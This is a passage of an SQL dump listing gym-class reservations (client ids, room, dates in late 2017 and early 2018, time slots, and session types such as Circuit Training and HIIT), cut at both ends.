(11697, 265, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11696, 195, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11695, 230, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11745, 138, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11701, 247, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11692, 230, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11690, 304, 'CTR', '2018-01-11', '12h45', '13h15', 'Circuit Training'),
(11802, 337, 'CTR', '2018-01-15', '17h30', '18h00', 'Circuit Training'),
(11686, 48, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11685, 294, 'CTR', '2018-01-10', '20h30', '21h00', 'Circuit training'),
(11684, 264, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11683, 338, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11741, 231, 'CTR', '2018-01-15', '17h30', '18h00', 'Circuit Training'),
(11742, 92, 'CTR', '2018-01-15', '17h30', '18h00', 'Circuit Training'),
(11680, 132, 'CTR', '2018-01-10', '20h30', '21h00', 'Circuit training'),
(11679, 132, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11678, 269, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11677, 297, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11676, 294, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11665, 132, 'CTR', '2018-01-03', '20h30', '21h00', 'Circuit training'),
(11675, 138, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11674, 195, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11673, 265, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11672, 192, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11671, 308, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11669, 210, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11667, 323, 'CTR', '2018-01-03', '20h30', '21h00', 'Circuit training'),
(11666, 165, 'CTR', '2018-01-03', '20h30', '21h00', 'Circuit training'),
(11664, 195, 'CTR', '2018-01-03', '18h00', '18h30', 'Circuit Training'),
(11670, 231, 'CTR', '2018-01-03', '18h00', '18h30', 'Circuit Training'),
(11663, 173, 'CTR', '2018-01-03', '18h00', '18h30', 'Circuit Training'),
(11661, 344, 'CTR', '2018-01-03', '20h30', '21h00', 'Circuit training'),
(11660, 329, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11659, 48, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11658, 230, 'CTR', '2018-01-03', '18h45', '19h15', 'Circuit training'),
(11657, 230, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11656, 138, 'CTR', '2018-01-03', '18h00', '18h30', 'Circuit Training'),
(11655, 195, 'CTR', '2017-12-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11654, 345, 'CTR', '2017-12-28', '12h45', '13h15', 'Circuit Training'),
(11668, 278, 'CTR', '2018-01-05', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11652, 189, 'CTR', '2017-12-28', '12h45', '13h15', 'Circuit Training'),
(11643, 205, 'CTR', '2017-12-27', '18h00', '18h30', 'Circuit Training'),
(11642, 132, 'CTR', '2017-12-27', '20h30', '21h00', 'Circuit training'),
(11641, 165, 'CTR', '2017-12-27', '20h30', '21h00', 'Circuit training'),
(11640, 323, 'CTR', '2017-12-27', '20h30', '21h00', 'Circuit training'),
(11647, 48, 'CTR', '2017-12-27', '18h00', '18h30', 'Circuit Training'),
(11649, 339, 'CTR', '2017-12-27', '20h30', '21h00', 'Circuit training'),
(11650, 80, 'CTR', '2017-12-27', '20h30', '21h00', 'Circuit training'),
(11651, 205, 'CTR', '2017-12-28', '12h45', '13h15', 'Circuit Training'),
(11648, 173, 'CTR', '2017-12-27', '18h00', '18h30', 'Circuit Training'),
(11633, 195, 'CTR', '2017-12-27', '18h00', '18h30', 'Circuit Training'),
(11644, 230, 'CTR', '2017-12-27', '18h00', '18h30', 'Circuit Training'),
(11631, 231, 'CTR', '2017-12-27', '18h00', '18h30', 'Circuit Training'),
(11646, 180, 'CTR', '2017-12-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11629, 294, 'CTR', '2017-12-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11628, 48, 'CTR', '2017-12-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11627, 261, 'CTR', '2017-12-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11626, 264, 'CTR', '2017-12-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11625, 297, 'CTR', '2017-12-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11624, 265, 'CTR', '2017-12-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11623, 294, 'CTR', '2017-12-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11645, 3, 'CTR', '2017-12-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11607, 105, 'CTR', '2017-12-21', '18h45', '19h15', 'Circuit Training'),
(11606, 342, 'CTR', '2017-12-21', '18h45', '19h15', 'Circuit Training'),
(11605, 322, 'CTR', '2017-12-21', '18h45', '19h15', 'Circuit Training'),
(11604, 230, 'CTR', '2017-12-21', '18h45', '19h15', 'Circuit Training'),
(11603, 205, 'CTR', '2017-12-21', '18h45', '19h15', 'Circuit Training'),
(11602, 105, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11601, 231, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11600, 205, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11599, 210, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11598, 294, 'CTR', '2017-12-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11597, 132, 'CTR', '2017-12-20', '20h30', '21h00', 'Circuit training'),
(11596, 90, 'CTR', '2017-12-20', '20h30', '21h00', 'Circuit training'),
(11595, 344, 'CTR', '2017-12-20', '20h30', '21h00', 'Circuit training'),
(11594, 323, 'CTR', '2017-12-20', '20h30', '21h00', 'Circuit training'),
(11590, 80, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11589, 173, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11588, 31, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11587, 48, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11586, 195, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11585, 339, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11584, 310, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11583, 247, 'CTR', '2017-12-20', '18h45', '19h15', 'Circuit training'),
(11582, 180, 'CTR', '2017-12-20', '17h15', '18h00', 'Circuit Training'),
(11581, 316, 'CTR', '2017-12-20', '17h15', '18h00', 'Circuit Training'),
(11580, 177, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11579, 126, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11578, 80, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11592, 343, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11573, 265, 'CTR', '2017-12-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11612, 304, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11571, 132, 'CTR', '2017-12-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11575, 138, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11576, 140, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11569, 48, 'CTR', '2017-12-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11619, 224, 'CTR', '2017-12-21', '12h45', '13h15', 'Circuit Training'),
(11620, 80, 'CTR', '2017-12-21', '12h45', '13h15', 'Circuit Training'),
(11564, 80, 'CTR', '2017-12-13', '20h30', '21h00', 'Circuit training'),
(11563, 165, 'CTR', '2017-12-13', '20h30', '21h00', 'Circuit training'),
(11562, 323, 'CTR', '2017-12-13', '20h30', '21h00', 'Circuit training'),
(11507, 322, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11518, 205, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11519, 138, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11608, 264, 'CTR', '2017-12-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11521, 255, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11522, 231, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11574, 92, 'CTR', '2017-12-20', '18h00', '18h30', 'Circuit Training'),
(11558, 48, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(11557, 247, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(11593, 165, 'CTR', '2017-12-20', '20h30', '21h00', 'Circuit training'),
(11555, 318, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(11554, 339, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(11591, 138, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(11566, 92, 'CTR', '2017-12-13', '18h00', '18h30', 'Circuit Training'),
(11549, 343, 'CTR', '2017-12-13', '18h00', '18h30', 'Circuit Training'),
(11547, 210, 'CTR', '2017-12-13', '18h00', '18h30', 'Circuit Training'),
(11548, 140, 'CTR', '2017-12-13', '18h00', '18h30', 'Circuit Training'),
(11609, 264, 'CTR', '2017-12-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11544, 281, 'CTR', '2017-12-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11543, 281, 'CTR', '2017-12-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11618, 294, 'CTR', '2018-01-03', '20h30', '21h00', 'Circuit training'),
(11541, 306, 'CTR', '2017-12-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11540, 306, 'CTR', '2017-12-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11617, 294, 'CTR', '2017-12-21', '12h45', '13h15', 'Circuit Training'),
(11538, 297, 'CTR', '2017-12-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11537, 297, 'CTR', '2017-12-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11536, 265, 'CTR', '2017-12-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11615, 189, 'CTR', '2017-12-21', '12h45', '13h15', 'Circuit Training'),
(11616, 294, 'CTR', '2017-12-27', '20h30', '21h00', 'Circuit training'),
(11532, 338, 'CTR', '2017-12-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11531, 338, 'CTR', '2017-12-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11530, 48, 'CTR', '2017-12-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11529, 48, 'CTR', '2017-12-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11528, 249, 'CTR', '2017-12-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11527, 249, 'CTR', '2017-12-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11526, 260, 'CTR', '2017-12-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11525, 260, 'CTR', '2017-12-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11613, 299, 'CTR', '2017-12-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11614, 299, 'CTR', '2017-12-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11510, 334, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11509, 334, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11506, 230, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11505, 325, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11504, 342, 'CTR', '2017-12-14', '18h45', '19h15', 'Circuit Training'),
(11503, 48, 'CTR', '2017-12-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11501, 80, 'CTR', '2017-12-07', '12h45', '13h15', 'Circuit Training'),
(11500, 224, 'CTR', '2017-12-07', '12h45', '13h15', 'Circuit Training'),
(11499, 189, 'CTR', '2017-12-07', '12h45', '13h15', 'Circuit Training'),
(11498, 260, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11497, 260, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11496, 302, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11495, 303, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11494, 303, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11493, 302, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11492, 306, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11491, 306, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11490, 301, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11489, 301, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11488, 265, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11487, 265, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11486, 297, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)');
INSERT INTO `reservation_reservation` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(11485, 297, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11484, 281, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11483, 281, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11482, 298, 'CTR', '2017-12-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11481, 298, 'CTR', '2017-12-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11480, 305, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11479, 305, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11478, 279, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11477, 279, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11476, 338, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11475, 338, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11474, 48, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11473, 48, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11472, 249, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11471, 249, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11517, 312, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11516, 324, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11468, 337, 'CTR', '2017-12-18', '17h30', '18h00', 'Circuit Training'),
(11467, 138, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11466, 92, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11465, 255, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11464, 231, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11515, 341, 'CTR', '2017-12-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11463, 205, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11459, 230, 'CTR', '2017-12-07', '18h45', '19h15', 'Circuit Training'),
(11454, 303, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11453, 303, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11452, 302, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11451, 302, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11450, 132, 'CTR', '2017-12-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11502, 322, 'CTR', '2017-12-07', '18h45', '19h15', 'Circuit Training'),
(11448, 342, 'CTR', '2017-12-07', '18h45', '19h15', 'Circuit Training'),
(11447, 325, 'CTR', '2017-12-07', '18h45', '19h15', 'Circuit Training'),
(11446, 249, 'CTR', '0000-00-00', '18h45', '19h15', 'Circuit Training'),
(11445, 249, 'CTR', '0000-00-00', '18h00', '18h30', 'Circuit training'),
(11444, 80, 'CTR', '2017-12-06', '20h30', '21h00', 'Circuit training'),
(11443, 126, 'CTR', '2017-12-06', '18h00', '18h30', 'Circuit Training'),
(11442, 177, 'CTR', '2017-12-06', '18h00', '18h30', 'Circuit Training'),
(11441, 195, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11535, 265, 'CTR', '2017-12-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11512, 312, 'CTR', '2017-12-11', '17h30', '18h00', 'Circuit Training'),
(11437, 48, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11436, 31, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11435, 318, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11434, 339, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11432, 247, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11433, 310, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11431, 173, 'CTR', '2017-12-06', '18h45', '19h15', 'Circuit training'),
(11430, 205, 'CTR', '2017-12-06', '17h15', '18h00', 'Circuit Training'),
(11514, 341, 'CTR', '2017-12-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11428, 180, 'CTR', '2017-12-06', '17h15', '18h00', 'Circuit Training'),
(11457, 140, 'CTR', '2017-12-06', '18h00', '18h30', 'Circuit Training'),
(11455, 132, 'CTR', '2017-12-18', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11456, 132, 'CTR', '2017-12-18', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11425, 301, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11424, 298, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11423, 298, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11422, 281, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11421, 281, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11420, 306, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11419, 306, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11418, 301, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11417, 297, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11416, 297, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11415, 265, 'CTR', '2017-12-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11414, 265, 'CTR', '2017-12-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11413, 328, 'CTR', '2017-12-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11412, 328, 'CTR', '2017-12-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11458, 343, 'CTR', '2017-12-06', '18h00', '18h30', 'Circuit Training'),
(11409, 279, 'CTR', '2017-12-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11408, 279, 'CTR', '2017-12-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11407, 132, 'CTR', '2017-12-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11406, 132, 'CTR', '2017-12-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11405, 338, 'CTR', '2017-12-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11404, 338, 'CTR', '2017-12-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11403, 48, 'CTR', '2017-12-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11402, 48, 'CTR', '2017-12-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11401, 305, 'CTR', '2017-12-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11400, 305, 'CTR', '2017-12-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11399, 205, 'CTR', '2017-12-04', '17h30', '18h00', 'Circuit Training'),
(11398, 255, 'CTR', '2017-12-04', '17h30', '18h00', 'Circuit Training'),
(11621, 48, 'CTR', '2017-12-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11392, 294, 'CTR', '2017-12-12', '18h00', '18h30', 'Circuit Training'),
(11391, 294, 'CTR', '2017-11-30', '18h00', '18h30', 'Circuit training'),
(11390, 338, 'CTR', '2017-11-29', '17h15', '18h00', 'Circuit Training'),
(11389, 205, 'CTR', '2017-11-27', '17h30', '18h00', 'Circuit Training'),
(11388, 189, 'CTR', '2017-11-30', '12h45', '13h15', 'Circuit Training'),
(11387, 224, 'CTR', '2017-11-30', '12h45', '13h15', 'Circuit Training'),
(11386, 342, 'CTR', '2017-11-30', '18h45', '19h15', 'Circuit Training'),
(11385, 325, 'CTR', '2017-11-30', '18h45', '19h15', 'Circuit Training'),
(11384, 230, 'CTR', '2017-11-30', '18h45', '19h15', 'Circuit Training'),
(11383, 105, 'CTR', '2017-11-30', '18h45', '19h15', 'Circuit Training'),
(11382, 264, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11381, 264, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11378, 205, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11377, 230, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11376, 132, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11375, 31, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11396, 231, 'CTR', '2017-12-04', '17h30', '18h00', 'Circuit Training'),
(11397, 337, 'CTR', '2017-12-04', '17h30', '18h00', 'Circuit Training'),
(11373, 261, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11372, 180, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11371, 3, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11370, 205, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11369, 338, 'CTR', '2017-11-24', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11380, 341, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11379, 341, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11366, 132, 'CTR', '2017-11-29', '20h30', '21h00', 'Circuit training'),
(11365, 90, 'CTR', '2017-11-29', '20h30', '21h00', 'Circuit training'),
(11364, 205, 'CTR', '2017-11-29', '17h15', '18h00', 'Circuit Training'),
(11362, 165, 'CTR', '2017-11-29', '20h30', '21h00', 'Circuit training'),
(11363, 323, 'CTR', '2017-11-29', '20h30', '21h00', 'Circuit training'),
(11360, 173, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11358, 318, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11359, 339, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11357, 310, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11356, 92, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11355, 280, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11354, 138, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11395, 265, 'CTR', '2017-12-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11361, 31, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11351, 48, 'CTR', '2017-11-29', '18h45', '19h15', 'Circuit training'),
(11350, 177, 'CTR', '2017-11-29', '18h00', '18h30', 'Circuit Training'),
(11348, 180, 'CTR', '2017-11-29', '17h15', '18h00', 'Circuit Training'),
(11347, 333, 'CTR', '2017-11-29', '17h15', '18h00', 'Circuit Training'),
(11346, 316, 'CTR', '2017-11-29', '17h15', '18h00', 'Circuit Training'),
(11345, 342, 'CTR', '2017-11-23', '18h45', '19h15', 'Circuit Training'),
(11342, 298, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11341, 298, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11340, 281, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11339, 281, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11338, 297, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11337, 297, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11336, 265, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11335, 265, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11334, 306, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11333, 306, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11332, 301, 'CTR', '2017-11-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11331, 301, 'CTR', '2017-11-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11330, 48, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11329, 48, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11328, 132, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11327, 132, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11326, 260, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11325, 260, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11324, 334, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11323, 334, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11322, 305, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11321, 305, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11320, 338, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11319, 338, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11318, 279, 'CTR', '2017-11-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11317, 279, 'CTR', '2017-11-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11316, 138, 'CTR', '2017-12-04', '17h30', '18h00', 'Circuit Training'),
